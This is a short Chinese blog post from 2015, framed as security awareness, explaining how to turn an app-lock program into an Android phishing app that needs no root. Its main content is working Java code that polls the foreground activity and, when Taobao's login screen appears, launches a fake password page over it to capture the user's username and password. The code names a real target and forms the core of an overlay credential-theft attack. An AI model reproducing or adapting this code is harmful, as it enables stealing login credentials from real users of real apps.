Android安全问题钓鱼程序

浏览数：20 / 时间：2015年06月11日

导读：文本介绍一种钓鱼应用，讲述如何骗取用户的用户名和密码，无须root

之前我已经展示了如何制作程序锁。当打开指定应用的时候，弹出一个密码页面。

程序锁的话题虽然是和安全相关，但是这应该属于防范的范围，如果被人恶意利用，那么后果……

这期我来揭示一下一种钓鱼程序的原理，希望广大用户不要上当受骗，最主要的是：希望大家意识到安全问

之前我用定时扫描activity的方法来检查打开的页面是不是我们所需要的页面

ComponentName topActivity = mActivityManager.getRunningTasks(1).get(0).topActivity;

如何用于钓鱼呢？比如我打开了淘宝，然后想登录，查看一下我淘宝，这时候会打开下面这个页面

从log中我们能得到其包和类的信息

log 写道

10-17 10:02:14.698: I/ActivityManager(246): Displayed com.taobao.taobao/com.taobao.tao.LoginActivity: +305ms

恩，这就好办了，下面我只需改三处，程序锁这个应用就会变成调用应用

第一个修改很简单，修改我们监听的包名和类名即可

String testPackageName = "com.taobao.taobao";
String testClassName = "com.taobao.tao.LoginActivity";

完整代码

public class LockTask extends TimerTask {
    public static final String TAG = "LockTask";
    private Context mContext;
    String testPackageName = "com.taobao.taobao";
    String testClassName = "com.taobao.tao.LoginActivity";

    private ActivityManager mActivityManager;

    public LockTask(Context context) {
        mContext = context;
        mActivityManager = (ActivityManager) context.getSystemService("activity");
    }

    @Override
    public void run() {
        ComponentName topActivity = mActivityManager.getRunningTasks(1).get(0).topActivity;
        String packageName = topActivity.getPackageName();
        String className = topActivity.getClassName();
        Log.v(TAG, "packageName" + packageName);
        Log.v(TAG, "className" + className);

        if (testPackageName.equals(packageName)
                && testClassName.equals(className)) {
            Intent intent = new Intent();
            intent.setClassName("com.example.locktest", "com.example.locktest.PasswordActivity");
            intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
            mContext.startActivity(intent);
        }
    }
}